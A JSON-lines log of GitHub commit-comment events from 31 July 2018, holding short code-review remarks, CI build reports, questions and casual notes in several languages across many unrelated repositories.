{"id":"8042281805","type":"CommitCommentEvent","actor":{"login":"alfonsogarciacaro"},"repo":{"name":"fable-compiler/repl2"},"payload":{"comment":{"id":29899725,"position":16,"line":313,"path":"public/samples/elmish/spreadsheet.fs","commit_id":"089b9e7bff353a8a776c7838033687efa3244057","created_at":"2018-07-31T07:36:15Z","updated_at":"2018-07-31T07:36:15Z","author_association":"MEMBER","body":"@ncave I found a situation where https://github.com/fable-compiler/Fable/pull/1473 is causing problems. If I don't type the `code` argument here it's inferred as `:> seq<char>` so we don't detect the cast `string :> char[]`. Hopefully, [this fixes it](https://github.com/fable-compiler/Fable/commit/d56571e1d23d64d6c2aadebd39bf3d0ac594af56#diff-a34e57b30a53951ff9b99ce4076feaa4R493)."}},"created_at":"2018-07-31T07:36:15Z"}
{"id":"8042284965","type":"CommitCommentEvent","actor":{"login":"kevinmissjoyce"},"repo":{"name":"kevinmissjoyce/gmall0328"},"payload":{"comment":{"id":29899735,"position":null,"line":null,"path":null,"commit_id":"6ab6eab99a930ff3e7deee9566345c545d56f8df","created_at":"2018-07-31T07:36:57Z","updated_at":"2018-07-31T07:36:57Z","author_association":"OWNER","body":"Hello，son of the beach!"}},"created_at":"2018-07-31T07:36:57Z"}
{"id":"8042287969","type":"CommitCommentEvent","actor":{"login":"ChelseaDagger"},"repo":{"name":"Gsuper36/DungeonGame"},"payload":{"comment":{"id":29899747,"position":null,"line":null,"path":null,"commit_id":"700ae92d9efc7316291cd93e48e79bb44564f0de","created_at":"2018-07-31T07:37:39Z","updated_at":"2018-07-31T07:37:39Z","author_association":"COLLABORATOR","body":"Это получилось случайно!!!!\r\n"}},"created_at":"2018-07-31T07:37:39Z"}
{"id":"8042296350","type":"CommitCommentEvent","actor":{"login":"garbear"},"repo":{"name":"wsnipex/xbmc"},"payload":{"comment":{"id":29899760,"position":20,"line":80,"path":"cmake/modules/FindFlatBuffers.cmake","commit_id":"46527b86db329fdae03607960fa9b8def3b98df7","created_at":"2018-07-31T07:39:27Z","updated_at":"2018-07-31T07:39:27Z","author_association":"NONE","body":"Does this mean we have to modify the CMake module every time a new set of message definitions is added?"}},"created_at":"2018-07-31T07:39:27Z"}
{"id":"8042306833","type":"CommitCommentEvent","actor":{"login":"apiaoapiao"},"repo":{"name":"UnityRPG/1-Character-Movement"},"payload":{"comment":{"id":29899775,"position":9,"line":22,"path":"readme.md","commit_id":"d4e25a2d8902fa1bef1d1006e00a448051afd743","created_at":"2018-07-31T07:41:37Z","updated_at":"2018-07-31T07:41:37Z","author_association":"NONE","body":".."}},"created_at":"2018-07-31T07:41:37Z"}
{"id":"8042308719","type":"CommitCommentEvent","actor":{"login":"apiaoapiao"},"repo":{"name":"UnityRPG/1-Character-Movement"},"payload":{"comment":{"id":29899779,"position":13,"line":26,"path":"readme.md","commit_id":"d4e25a2d8902fa1bef1d1006e00a448051afd743","created_at":"2018-07-31T07:42:02Z","updated_at":"2018-07-31T07:42:02Z","author_association":"NONE","body":"Thanks for visiting, and enjoy your stay"}},"created_at":"2018-07-31T07:42:02Z"}
{"id":"8042310527","type":"CommitCommentEvent","actor":{"login":"cxz77411"},"repo":{"name":"cxz77411/cxz77411.github.io"},"payload":{"comment":{"id":29899785,"position":null,"line":null,"path":null,"commit_id":"a9d5004687ba5a93ba125a4e6067a400ccdb13d2","created_at":"2018-07-31T07:42:26Z","updated_at":"2018-07-31T07:42:26Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-31T07:42:26Z"}
{"id":"8042315137","type":"CommitCommentEvent","actor":{"login":"obweng"},"repo":{"name":"outboundworks/slack-github-mentions"},"payload":{"comment":{"id":29899793,"position":1,"line":1,"path":"README","commit_id":"df9dbe911d9abbb37e2c4eede603a485cab35cf1","created_at":"2018-07-31T07:43:25Z","updated_at":"2018-07-31T07:43:25Z","author_association":"NONE","body":"this is kind of weak"}},"created_at":"2018-07-31T07:43:25Z"}
{"id":"8042315498","type":"CommitCommentEvent","actor":{"login":"baffioso"},"repo":{"name":"regiongis/python_helpers"},"payload":{"comment":{"id":29899795,"position":null,"line":null,"path":null,"commit_id":"7e41d135180e1eb9047b67ec21b9738d12664653","created_at":"2018-07-31T07:43:30Z","updated_at":"2018-07-31T07:43:30Z","author_association":"NONE","body":"Ja, det kunne godt være løsningen"}},"created_at":"2018-07-31T07:43:30Z"}
{"id":"8042319604","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29899799,"position":null,"line":null,"path":null,"commit_id":"9ca10fdcef8888cc24e450b1a64010ffd03ba73f","created_at":"2018-07-31T07:44:23Z","updated_at":"2018-07-31T07:44:23Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#pr-142](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#pr-142).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-142-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-31T07:44:23Z"}
{"id":"8042321633","type":"CommitCommentEvent","actor":{"login":"kamakshidasan"},"repo":{"name":"topology-tool-kit/ttk"},"payload":{"comment":{"id":29899806,"position":null,"line":null,"path":null,"commit_id":"025b4437e93bb9ab477230b0fd4e93151b7a12e9","created_at":"2018-07-31T07:44:49Z","updated_at":"2018-07-31T07:44:49Z","author_association":"CONTRIBUTOR","body":"@julien-tierny This is the most cheekiest commit ever. Congratulations! :P"}},"created_at":"2018-07-31T07:44:49Z"}
{"id":"8042321713","type":"CommitCommentEvent","actor":{"login":"shilgam"},"repo":{"name":"shilgam/blog"},"payload":{"comment":{"id":29899807,"position":null,"line":null,"path":null,"commit_id":"e64acb099e98af1985ea955f93597c68dfe0a7ca","created_at":"2018-07-31T07:44:51Z","updated_at":"2018-07-31T07:44:51Z","author_association":"OWNER","body":"this configuration taken from https://github.com/shilgam/dockerized-rails-capybara-tests-on-top-of-selenium/commit/da5c304d8ec56f726db4de1dff70513d249e065d"}},"created_at":"2018-07-31T07:44:51Z"}
{"id":"8042322507","type":"CommitCommentEvent","actor":{"login":"d4rk694"},"repo":{"name":"AmauriC/tarteaucitron.js"},"payload":{"comment":{"id":29899812,"position":null,"line":null,"path":null,"commit_id":"1ea7bfa82ab2fca3ca1faacd66b96f39b4e638d4","created_at":"2018-07-31T07:45:01Z","updated_at":"2018-07-31T07:45:01Z","author_association":"CONTRIBUTOR","body":"Oups! Merci, j'avais pas vu..."}},"created_at":"2018-07-31T07:45:01Z"}
{"id":"8042323163","type":"CommitCommentEvent","actor":{"login":"nechry"},"repo":{"name":"NebzHB/plugin-homebridge"},"payload":{"comment":{"id":29899817,"position":112,"line":937,"path":"docs/fr_FR/index.md","commit_id":"fedf649c2213119f3a7ad9f64e8e2fc5cd29f479","created_at":"2018-07-31T07:45:09Z","updated_at":"2018-07-31T07:45:09Z","author_association":"NONE","body":"faudrait pas aussi ici ajouter le `-rtsp_transport tcp` ? "}},"created_at":"2018-07-31T07:45:09Z"}
{"id":"8042328395","type":"CommitCommentEvent","actor":{"login":"rcy"},"repo":{"name":"outboundworks/slack-github-mentions"},"payload":{"comment":{"id":29899832,"position":2,"line":2,"path":".gitignore","commit_id":"df9dbe911d9abbb37e2c4eede603a485cab35cf1","created_at":"2018-07-31T07:46:14Z","updated_at":"2018-07-31T07:46:14Z","author_association":"CONTRIBUTOR","body":"wow"}},"created_at":"2018-07-31T07:46:14Z"}
{"id":"8042328782","type":"CommitCommentEvent","actor":{"login":"NebzHB"},"repo":{"name":"NebzHB/plugin-homebridge"},"payload":{"comment":{"id":29899834,"position":112,"line":937,"path":"docs/fr_FR/index.md","commit_id":"fedf649c2213119f3a7ad9f64e8e2fc5cd29f479","created_at":"2018-07-31T07:46:19Z","updated_at":"2018-07-31T07:46:19Z","author_association":"OWNER","body":"non ca ne semble pas être une source rtsp mais mjpeg\r\n"}},"created_at":"2018-07-31T07:46:19Z"}
{"id":"8042332472","type":"CommitCommentEvent","actor":{"login":"rcy"},"repo":{"name":"outboundworks/slack-github-mentions"},"payload":{"comment":{"id":29899846,"position":2,"line":2,"path":".gitignore","commit_id":"df9dbe911d9abbb37e2c4eede603a485cab35cf1","created_at":"2018-07-31T07:47:09Z","updated_at":"2018-07-31T07:47:09Z","author_association":"CONTRIBUTOR","body":"again"}},"created_at":"2018-07-31T07:47:09Z"}
{"id":"8042334159","type":"CommitCommentEvent","actor":{"login":"rcy"},"repo":{"name":"outboundworks/slack-github-mentions"},"payload":{"comment":{"id":29899849,"position":2,"line":2,"path":".gitignore","commit_id":"df9dbe911d9abbb37e2c4eede603a485cab35cf1","created_at":"2018-07-31T07:47:32Z","updated_at":"2018-07-31T07:47:32Z","author_association":"CONTRIBUTOR","body":"nohonetuh"}},"created_at":"2018-07-31T07:47:32Z"}
{"id":"8042335404","type":"CommitCommentEvent","actor":{"login":"rcy"},"repo":{"name":"outboundworks/slack-github-mentions"},"payload":{"comment":{"id":29899851,"position":2,"line":2,"path":".gitignore","commit_id":"df9dbe911d9abbb37e2c4eede603a485cab35cf1","created_at":"2018-07-31T07:47:49Z","updated_at":"2018-07-31T07:47:49Z","author_association":"CONTRIBUTOR","body":"ntoheunte"}},"created_at":"2018-07-31T07:47:49Z"}
{"id":"8042342055","type":"CommitCommentEvent","actor":{"login":"lukas-lang"},"repo":{"name":"micro-manager/micro-manager"},"payload":{"comment":{"id":29899858,"position":null,"line":null,"path":null,"commit_id":"844570741135ddb7cf6d4b3412979b2d753c1f85","created_at":"2018-07-31T07:49:13Z","updated_at":"2018-07-31T07:49:13Z","author_association":"NONE","body":"@marktsuchida In case this is still an issue: One possible solution would obviously be to reset the head of the master branch back one commit and `push --force` the whole thing to GitHub - of course, this won't make people who've pulled the change happy, but it shouldn't be the end of the world.\r\n\r\n\r\nAlternatively, depending on your setup, [this article](https://ben.lobaugh.net/blog/147853/creating-a-two-way-sync-between-a-github-repository-and-subversion) might be of use."}},"created_at":"2018-07-31T07:49:13Z"}
{"id":"8042342956","type":"CommitCommentEvent","actor":{"login":"Mr-Rm"},"repo":{"name":"EvilBeaver/OneScript"},"payload":{"comment":{"id":29899859,"position":60,"line":62,"path":"src/ScriptEngine/Machine/TypeFactory.cs","commit_id":"f9a113adc9488fcca10813123b24ad4b21ddfb83","created_at":"2018-07-31T07:49:24Z","updated_at":"2018-07-31T07:49:24Z","author_association":"CONTRIBUTOR","body":"Ошибка появляется здесь, если у конструктора есть завершающие параметры, со значениями по умолчанию, которые не указаны при вызове.\r\nНа примере `ZipReader ConstructByNameAndPassword`, вызов которого и даёт ошибку при сборке: здесь формируется `args[1]`, а в следующей строке - проверка условия `IIF(args[1]==null,null,args[1]`, но массив фактических параметров arguments имеет только один элемент, `args[1]` отсутствует. В результате чего и имеем  _unicode-zipper.os / Ошибка в строке: 20 / Внешнее исключение (System.IndexOutOfRangeException): Index was outside the bounds of the array.}_\r\nВ рантайме. На ещё одном уровне косвенности."}},"created_at":"2018-07-31T07:49:24Z"}
{"id":"8042344530","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29899862,"position":null,"line":null,"path":null,"commit_id":"2c43d0b852bf1e81e092fb674ad6a6188ee0afb4","created_at":"2018-07-31T07:49:44Z","updated_at":"2018-07-31T07:49:44Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2996 of 2996 tests passed, 1 test warnings)\n\nMessages:\n\n * 1 test had: ERR diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2c43d0b852bf1e81e092fb674ad6a6188ee0afb4-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2c43d0b852bf1e81e092fb674ad6a6188ee0afb4-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T07:49:44Z"}
{"id":"8042346651","type":"CommitCommentEvent","actor":{"login":"hoangthan"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29899869,"position":null,"line":null,"path":null,"commit_id":"638c50c6bd42e356cef39706699429aff19be44e","created_at":"2018-07-31T07:50:13Z","updated_at":"2018-07-31T07:50:13Z","author_association":"NONE","body":"When i run enable-migrations command, it's generates a cs file name \"_InitialCreate\"...what should I do ?"}},"created_at":"2018-07-31T07:50:13Z"}
{"id":"8042349534","type":"CommitCommentEvent","actor":{"login":"kevin-wang001"},"repo":{"name":"hsrong/dubbo"},"payload":{"comment":{"id":29899877,"position":null,"line":null,"path":null,"commit_id":"8f382018f4ae55fe802176facf93716796e8dfeb","created_at":"2018-07-31T07:50:43Z","updated_at":"2018-07-31T07:50:43Z","author_association":"NONE","body":"Provider向Consumer回传，也是通过Attachment，是吧"}},"created_at":"2018-07-31T07:50:43Z"}
{"id":"8042349730","type":"CommitCommentEvent","actor":{"login":"kevin-wang001"},"repo":{"name":"hsrong/dubbo"},"payload":{"comment":{"id":29899878,"position":null,"line":null,"path":null,"commit_id":"8f382018f4ae55fe802176facf93716796e8dfeb","created_at":"2018-07-31T07:50:45Z","updated_at":"2018-07-31T07:50:45Z","author_association":"NONE","body":"Provider向Consumer回传，也是通过Attachment，是吧"}},"created_at":"2018-07-31T07:50:45Z"}
{"id":"8042350432","type":"CommitCommentEvent","actor":{"login":"katrinleinweber"},"repo":{"name":"swcarpentry/website"},"payload":{"comment":{"id":29899879,"position":null,"line":null,"path":null,"commit_id":"2b51a64239b14d56114a537bc6e0e41b4dfe0224","created_at":"2018-07-31T07:50:52Z","updated_at":"2018-07-31T07:50:52Z","author_association":"CONTRIBUTOR","body":"Hi @jduckles! Are these graphs' source data and R code public? I'd like to beautify them a bit and increase the font sizes. In [Carpentries/assessment](https://github.com/carpentries/assessment) I find only Python and other R analyses. Thanks for any pointers here!"}},"created_at":"2018-07-31T07:50:52Z"}
{"id":"8042350605","type":"CommitCommentEvent","actor":{"login":"escopecz"},"repo":{"name":"mautic-inc/plugin-mautic-integrations"},"payload":{"comment":{"id":29899880,"position":36,"line":60,"path":"Config/config.php","commit_id":"aaded00e7bf9b06d54cb56e3cd33b0b0caae345e","created_at":"2018-07-31T07:50:54Z","updated_at":"2018-07-31T07:50:54Z","author_association":"NONE","body":"I'm getting error here:\r\n\r\n`Symfony\\Component\\DependencyInjection\\Exception\\ServiceNotFoundException: The service \"mautic.integrations.service.sync\" has a dependency on a non-existent service \"mautic.plugin.repository.integration_entity\".`\r\n\r\nWhat was the intention with this? It kinda makes it hard to continue with the Magento plugin."}},"created_at":"2018-07-31T07:50:54Z"}
{"id":"8042360145","type":"CommitCommentEvent","actor":{"login":"yeanlieng"},"repo":{"name":"yeanlieng/Openholo"},"payload":{"comment":{"id":29899906,"position":null,"line":null,"path":null,"commit_id":"3fa79a36f1bbce926b7e7507f141c29de2946c5f","created_at":"2018-07-31T07:52:53Z","updated_at":"2018-07-31T07:52:53Z","author_association":"OWNER","body":"parameter update"}},"created_at":"2018-07-31T07:52:53Z"}
{"id":"8042363345","type":"CommitCommentEvent","actor":{"login":"DarkWav"},"repo":{"name":"DarkWav/SAC"},"payload":{"comment":{"id":29899915,"position":null,"line":null,"path":null,"commit_id":"395928a39d02e2adf80bbf8599f845a413c605bb","created_at":"2018-07-31T07:53:35Z","updated_at":"2018-07-31T07:53:35Z","author_association":"OWNER","body":"*bugfixes :P"}},"created_at":"2018-07-31T07:53:35Z"}
{"id":"8042364265","type":"CommitCommentEvent","actor":{"login":"etibger"},"repo":{"name":"etibger/pdf2xlsx"},"payload":{"comment":{"id":29899917,"position":null,"line":null,"path":null,"commit_id":"fdef3dd180bc473184fe59964a2f1d25000442e1","created_at":"2018-07-31T07:53:46Z","updated_at":"2018-07-31T07:53:46Z","author_association":"OWNER","body":"Hi!\nSorry about that. This is not a generic converter, it only works with very\nspecific documents.\nBest Regards\n\nOn Tue, 31 Jul 2018 08:32 freakzo, <notifications@github.com> wrote:\n\n> How can i go about correcting the error \"AttributeError: 'NoneType' object\n> has no attribute 'xlsx_write'\"\n>\n> It says it's happening on line 123.\n>\n> Thank you. I'm using python 3.x, is it because of that?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/etibger/pdf2xlsx/commit/fdef3dd180bc473184fe59964a2f1d25000442e1#commitcomment-29898276>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMsYAT_Lyava916XKz692cNnzo2FLQKxks5uL_nsgaJpZM4VnrHe>\n> .\n>\n"}},"created_at":"2018-07-31T07:53:46Z"}
{"id":"8042383597","type":"CommitCommentEvent","actor":{"login":"rKaradjia"},"repo":{"name":"rKaradjia/Autoroute_angular"},"payload":{"comment":{"id":29899961,"position":null,"line":null,"path":null,"commit_id":"ad7cac49fe514eb978ddc4bf6b12dfef9fcb3598","created_at":"2018-07-31T07:57:53Z","updated_at":"2018-07-31T07:57:53Z","author_association":"OWNER","body":"Exemple : pour une reservation le 1er Aout 2018.\r\n                 Le client peut la supprimer jusqu'à ce soir 00H00"}},"created_at":"2018-07-31T07:57:53Z"}
{"id":"8042384703","type":"CommitCommentEvent","actor":{"login":"odony"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29899963,"position":10,"line":193,"path":"addons/purchase/models/stock.py","commit_id":"3869cdf7d8202c8157c1134d74549b3096758253","created_at":"2018-07-31T07:58:07Z","updated_at":"2018-07-31T07:58:07Z","author_association":"CONTRIBUTOR","body":"For v11, please keep your code compatible with Python2, and use the old complete super() form. Thanks!"}},"created_at":"2018-07-31T07:58:07Z"}
{"id":"8042386278","type":"CommitCommentEvent","actor":{"login":"rKaradjia"},"repo":{"name":"rKaradjia/Autoroute_angular"},"payload":{"comment":{"id":29899966,"position":null,"line":null,"path":null,"commit_id":"ad7cac49fe514eb978ddc4bf6b12dfef9fcb3598","created_at":"2018-07-31T07:58:27Z","updated_at":"2018-07-31T07:58:27Z","author_association":"OWNER","body":"23H59 59 Secondes   le   31 juillet 2018\r\n"}},"created_at":"2018-07-31T07:58:27Z"}
{"id":"8042386613","type":"CommitCommentEvent","actor":{"login":"markaren"},"repo":{"name":"markaren/vcpkg"},"payload":{"comment":{"id":29899968,"position":null,"line":null,"path":null,"commit_id":"cd900dcd775dcb212e84dfb60b044291a1b74b4a","created_at":"2018-07-31T07:58:32Z","updated_at":"2018-07-31T07:58:32Z","author_association":"OWNER","body":"Fungerer ikke på linux. Vet ikke hvorfor enda.."}},"created_at":"2018-07-31T07:58:32Z"}
{"id":"8042386640","type":"CommitCommentEvent","actor":{"login":"TomKo1"},"repo":{"name":"mbartn/youtube_clone"},"payload":{"comment":{"id":29899969,"position":118,"line":122,"path":"lib/main.dart","commit_id":"0d598a75c9645327dc8a48e369e9fa2a08e7f6d5","created_at":"2018-07-31T07:58:32Z","updated_at":"2018-07-31T07:58:32Z","author_association":"NONE","body":"🥇 "}},"created_at":"2018-07-31T07:58:32Z"}
{"id":"8042387068","type":"CommitCommentEvent","actor":{"login":"BaCoNL"},"repo":{"name":"tronscan/tronscan-frontend"},"payload":{"comment":{"id":29899971,"position":null,"line":null,"path":null,"commit_id":"05ae9d0424cbc97731e6d6aa17195acbfc87ee27","created_at":"2018-07-31T07:58:38Z","updated_at":"2018-07-31T07:58:38Z","author_association":"CONTRIBUTOR","body":"Fixed #279 "}},"created_at":"2018-07-31T07:58:38Z"}
{"id":"8042393962","type":"CommitCommentEvent","actor":{"login":"kelvin-cao"},"repo":{"name":"susanmicrosemi/switchtec-kernel"},"payload":{"comment":{"id":29899985,"position":17,"line":125,"path":"linux/switchtec.h","commit_id":"cec33df78d7a3e0a2d1c66148bccae372ee0fcb8","created_at":"2018-07-31T08:00:08Z","updated_at":"2018-07-31T08:00:08Z","author_association":"NONE","body":"Generally, we do not use comment like this, it's not the kernel code style."}},"created_at":"2018-07-31T08:00:08Z"}
{"id":"8042399517","type":"CommitCommentEvent","actor":{"login":"kelvin-cao"},"repo":{"name":"susanmicrosemi/switchtec-kernel"},"payload":{"comment":{"id":29900000,"position":4,"line":21,"path":"linux/switchtec.h","commit_id":"cec33df78d7a3e0a2d1c66148bccae372ee0fcb8","created_at":"2018-07-31T08:01:13Z","updated_at":"2018-07-31T08:01:13Z","author_association":"NONE","body":"Please use the u8/u16/u32 type modifiers."}},"created_at":"2018-07-31T08:01:13Z"}
{"id":"8042401671","type":"CommitCommentEvent","actor":{"login":"cybojenix"},"repo":{"name":"py-zero/cryptozero"},"payload":{"comment":{"id":29900002,"position":10,"line":33,"path":"README.md","commit_id":"59a016d84be487003447703d9d06e640d64382b0","created_at":"2018-07-31T08:01:39Z","updated_at":"2018-07-31T08:01:39Z","author_association":"CONTRIBUTOR","body":"Hi Daniel, just letting you know I've seen these comments, and will look at addressing them soon"}},"created_at":"2018-07-31T08:01:39Z"}
{"id":"8042404031","type":"CommitCommentEvent","actor":{"login":"kelvin-cao"},"repo":{"name":"susanmicrosemi/switchtec-kernel"},"payload":{"comment":{"id":29900006,"position":85,"line":175,"path":"linux/switchtec.h","commit_id":"cec33df78d7a3e0a2d1c66148bccae372ee0fcb8","created_at":"2018-07-31T08:02:10Z","updated_at":"2018-07-31T08:02:10Z","author_association":"NONE","body":"style nit."}},"created_at":"2018-07-31T08:02:10Z"}
{"id":"8042405251","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29900009,"position":10,"line":193,"path":"addons/purchase/models/stock.py","commit_id":"3869cdf7d8202c8157c1134d74549b3096758253","created_at":"2018-07-31T08:02:23Z","updated_at":"2018-07-31T08:02:23Z","author_association":"CONTRIBUTOR","body":"Then #26058 is correct? I thought no compatibility with Python 2 can be guaranteed"}},"created_at":"2018-07-31T08:02:23Z"}
{"id":"8042409819","type":"CommitCommentEvent","actor":{"login":"kevinmissjoyce"},"repo":{"name":"kevinmissjoyce/gmall0328"},"payload":{"comment":{"id":29900015,"position":null,"line":null,"path":null,"commit_id":"6ab6eab99a930ff3e7deee9566345c545d56f8df","created_at":"2018-07-31T08:03:20Z","updated_at":"2018-07-31T08:03:20Z","author_association":"OWNER","body":"@Sucber son of the beach!"}},"created_at":"2018-07-31T08:03:20Z"}
{"id":"8042411372","type":"CommitCommentEvent","actor":{"login":"rKaradjia"},"repo":{"name":"rKaradjia/Autoroute_angular"},"payload":{"comment":{"id":29900016,"position":null,"line":null,"path":null,"commit_id":"ad7cac49fe514eb978ddc4bf6b12dfef9fcb3598","created_at":"2018-07-31T08:03:39Z","updated_at":"2018-07-31T08:03:39Z","author_association":"OWNER","body":"Pour l'instant la suppression n'est pas visible en dynamique (necessite de quitter puis de revenir sur la page) "}},"created_at":"2018-07-31T08:03:39Z"}
{"id":"8042415803","type":"CommitCommentEvent","actor":{"login":"bogdando"},"repo":{"name":"rabbitmq/rabbitmq-server-release"},"payload":{"comment":{"id":29900029,"position":4,"line":2185,"path":"scripts/rabbitmq-server-ha.ocf","commit_id":"2f284bf595dbbe1938a1ce3028b0299b1a75a6cc","created_at":"2018-07-31T08:04:38Z","updated_at":"2018-07-31T08:04:38Z","author_association":"CONTRIBUTOR","body":"@vuntz @michaelklishin I'm late to the party, sorry, but that discards the historical change https://review.openstack.org/#/c/184671/ and revives the [described corner case](https://bugs.launchpad.net/fuel/+bug/1455761) I believe."}},"created_at":"2018-07-31T08:04:38Z"}
{"id":"8042416305","type":"CommitCommentEvent","actor":{"login":"kevinmissjoyce"},"repo":{"name":"kevinmissjoyce/gmall0328"},"payload":{"comment":{"id":29900030,"position":null,"line":null,"path":null,"commit_id":"6ab6eab99a930ff3e7deee9566345c545d56f8df","created_at":"2018-07-31T08:04:44Z","updated_at":"2018-07-31T08:04:44Z","author_association":"OWNER","body":"@yisibugua-chw a pretty girl"}},"created_at":"2018-07-31T08:04:44Z"}
{"id":"8042418250","type":"CommitCommentEvent","actor":{"login":"savage4pro"},"repo":{"name":"savage4pro/swagger-php"},"payload":{"comment":{"id":29900034,"position":null,"line":null,"path":null,"commit_id":"a4a9208c678e90d2459df14acdeefe70413bc581","created_at":"2018-07-31T08:05:07Z","updated_at":"2018-07-31T08:05:07Z","author_association":"OWNER","body":"example\r\n```\r\n * @OA\\Info(\r\n *     version=\"1.0\",\r\n *     title=\"Sample API\",\r\n *     description=\"Длинное\\n\\nпредлинное\r\n *     `1` first\r\n *     `2` second\r\n *     ```shell\\nX-Request-ID: g9h3LkdJf8\\n```\r\n *     Описание api\r\n *     для блока ```@OA\\Info```\",\r\n *     @OA\\Contact(\r\n *         name=\"company name\",\r\n *         url=\"https://domain.tld\"\r\n *     ),\r\n * )\r\n```\r\ngenerates\r\n```\r\n    \"info\": {\r\n        \"title\": \"Sample API\",\r\n        \"description\": \"Длинное\\n\\nпредлинное\\n\\n`1` first\\n\\n`2` second\\n\\n```shell\\nX-Request-ID: g9h3LkdJf8\\n```\\n\\nОписание api\\n\\nдля блока ```@OA\\\\Info```\",\r\n        \"contact\": {\r\n            \"name\": \"company name\",\r\n            \"url\": \"https://domain.tld\"\r\n        },\r\n        \"version\": \"1.0\"\r\n    },\r\n```\r\nand in e.g. [ReDoc](https://github.com/Rebilly/ReDoc) it looks something like this\r\n![ReDoc Sample Info](https://monosnap.com/image/CSoY2myIO0QrELvhC0gfBhd1k0GBNZ.png)"}},"created_at":"2018-07-31T08:05:07Z"}
{"id":"8042420219","type":"CommitCommentEvent","actor":{"login":"corn91791"},"repo":{"name":"mattdean-digicatapult/ethereumjs-vm"},"payload":{"comment":{"id":29900037,"position":48,"line":48,"path":"examples/run-blockchain/test-data.json","commit_id":"0b2774a07ee48911a1fcc0da433913ba6b14ae63","created_at":"2018-07-31T08:05:28Z","updated_at":"2018-07-31T08:05:28Z","author_association":"NONE","body":"Whoever this is Jan block me from my own money will catch you"}},"created_at":"2018-07-31T08:05:28Z"}
{"id":"8042427269","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29900057,"position":null,"line":null,"path":null,"commit_id":"16bfa0e843c29d6245631b4335f6e6ef0d47cc8d","created_at":"2018-07-31T08:06:59Z","updated_at":"2018-07-31T08:06:59Z","author_association":"NONE","body":"#6868-EngRefEquationFixPart1 (RKStrand) - i386-Windows-7-VisualStudio-14: OK (2955 of 2955 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-16bfa0e843c29d6245631b4335f6e6ef0d47cc8d-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-16bfa0e843c29d6245631b4335f6e6ef0d47cc8d-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T08:06:59Z"}
{"id":"8042429198","type":"CommitCommentEvent","actor":{"login":"kelvin-cao"},"repo":{"name":"susanmicrosemi/switchtec-kernel"},"payload":{"comment":{"id":29900063,"position":45,"line":153,"path":"linux/switchtec.h","commit_id":"cec33df78d7a3e0a2d1c66148bccae372ee0fcb8","created_at":"2018-07-31T08:07:24Z","updated_at":"2018-07-31T08:07:24Z","author_association":"NONE","body":"Please remove leading white spaces."}},"created_at":"2018-07-31T08:07:24Z"}
{"id":"8042432157","type":"CommitCommentEvent","actor":{"login":"kelvin-cao"},"repo":{"name":"susanmicrosemi/switchtec-kernel"},"payload":{"comment":{"id":29900066,"position":70,"line":170,"path":"linux/switchtec.h","commit_id":"cec33df78d7a3e0a2d1c66148bccae372ee0fcb8","created_at":"2018-07-31T08:08:04Z","updated_at":"2018-07-31T08:08:04Z","author_association":"NONE","body":"please remove trailing white spaces."}},"created_at":"2018-07-31T08:08:04Z"}
{"id":"8042436786","type":"CommitCommentEvent","actor":{"login":"li-yibing"},"repo":{"name":"li-yibing/Cplusplus"},"payload":{"comment":{"id":29900069,"position":null,"line":null,"path":null,"commit_id":"314d2cc5bc764a65d31c716bf31215c2e53f1574","created_at":"2018-07-31T08:09:03Z","updated_at":"2018-07-31T08:09:03Z","author_association":"OWNER","body":"以形状与长方形的关系为例，练习了类的继承"}},"created_at":"2018-07-31T08:09:03Z"}
{"id":"8042436962","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29900070,"position":13,"line":13,"path":"019/1902.html","commit_id":"f5e1be67505177707df4f97eefb9d873c89d8311","created_at":"2018-07-31T08:09:05Z","updated_at":"2018-07-31T08:09:05Z","author_association":"COLLABORATOR","body":"scrollTop"}},"created_at":"2018-07-31T08:09:05Z"}
{"id":"8042437916","type":"CommitCommentEvent","actor":{"login":"kazuki-kachiri"},"repo":{"name":"kazuki-kachiri/klack"},"payload":{"comment":{"id":29900071,"position":null,"line":null,"path":null,"commit_id":"09126381448bddee4009c19f50f8c41cf96bb3b4","created_at":"2018-07-31T08:09:13Z","updated_at":"2018-07-31T08:09:13Z","author_association":"OWNER","body":"コメントアウトはご愛嬌"}},"created_at":"2018-07-31T08:09:13Z"}
